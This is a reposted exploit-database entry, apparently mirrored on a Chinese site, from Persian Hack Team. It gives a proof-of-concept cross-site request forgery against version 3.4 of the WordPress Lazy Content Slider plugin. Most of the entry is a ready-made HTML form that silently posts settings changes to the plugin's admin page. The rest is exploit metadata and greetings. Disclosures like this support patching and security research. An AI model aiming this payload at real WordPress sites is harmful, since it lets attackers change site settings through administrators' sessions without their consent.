WordPress Plugin Lazy Content Slider 3.4 – Cross-Site Request Forgery (Add Catetory) - 体验盒子

作者： Persian Hack Team

日期： 2016-07-08

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/40070/

######################
# Exploit Title : WordPress Lazy content Slider Plugin - CSRF Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/support/view/plugin-reviews/lazy-content-slider
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.4
# Date: 2016/07/08
######################
#
# PoC:
# The vulnerable page is
# /wp-content/plugins/lazy-content-slider/lzcs_admin.php
# The Code for CSRF.html is

<html>
<form action="http://localhost/wp/wp-admin/admin.php?page=lazy-content-slider%2Flzcs.php" method="POST">
<input name="lzcs" type="text" value="lzcs">
<input name="lzcs_color" type="text" value="dark">
<input type="text" name="lzcs_count" value="5">
<input type="submit" value="go!!">
</form>
</html>

#
######################
# Discovered by :Mojtaba MobhaM 
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi &Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################